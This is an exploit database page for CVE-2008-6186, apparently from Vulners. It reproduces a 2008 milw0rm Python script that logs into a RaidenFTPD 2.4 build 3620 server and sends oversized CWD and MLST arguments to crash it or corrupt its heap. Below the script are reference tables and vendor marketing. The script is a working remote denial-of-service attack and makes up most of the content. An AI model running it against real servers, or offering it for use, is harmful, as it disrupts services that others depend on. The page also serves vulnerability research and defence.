RaidenFTPd 2.4 build 3620 - Remote Denial of Service
| Reporter | Title | Published | Views | Family All 8 |
|---|---|---|---|---|
| CVE-2008-6186 | 13 Oct 200800:00 | – | circl | |
| CVE-2008-6186 | 19 Feb 200918:00 | – | cve | |
| CVE-2008-6186 | 19 Feb 200918:00 | – | cvelist | |
| EUVD-2008-6156 | 19 Feb 200918:00 | – | euvd | |
| CVE-2008-6186 | 19 Feb 200918:30 | – | nvd | |
| RaidenFTPD Server CWD and MLST Command DoS Vulnerability | 26 Feb 200900:00 | – | openvas | |
| RaidenFTPD Server CWD and MLST Command Denial of Service Vulnerability | 26 Feb 200900:00 | – | openvas | |
| Stack overflow | 19 Feb 200918:30 | – | prion |
# RaidenFTPD V2.4 build 3620 exploit
# probaly heap overflow
#
# (x)dmnt 2008
# -*- coding: windows-1252 -*-
import socket
import sys, time
evil_cwd = "/"+"\x22"*255
evil_dir = "X"*505
def help_info():
print ("Usage: ShaoKahn <host> <login> <password>\n")
print ("Note: anonymous is enought")
def dos_it(hostname, username, passwd):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
sock.connect((hostname, 21))
except:
print ("[-] Connection error!")
sys.exit(1)
r=sock.recv(2048)
print "[+] Connected"
sock.send("user %s\r\n" %username)
r=sock.recv(1024)
time.sleep(3)
sock.send("pass %s\r\n" %passwd)
r=sock.recv(1024)
print "[+] Send evil string"
time.sleep(3)
sock.send("cwd %s\r\n" %evil_cwd)
r=sock.recv(1024)
time.sleep(3)
sock.send("mlst %s\r\n" %evil_dir)
r=sock.recv(1024)
time.sleep(3)
sock.close()
print "[:)] Now server d0s'ed/heap corrupted"
print ("\n]RaidenFTPD V2.4 build 3620 remote DoS exploit")
print ("](x)dmnt 2008\n\n")
if len(sys.argv) <> 4:
help_info()
sys.exit(1)
else:
hostname=sys.argv[1]
username=sys.argv[2]
passwd=sys.argv[3]
dos_it(hostname,username,passwd)
sys.exit(0)
# milw0rm.com [2008-10-13]Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
13 Oct 2008 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 29
EPSS0.05301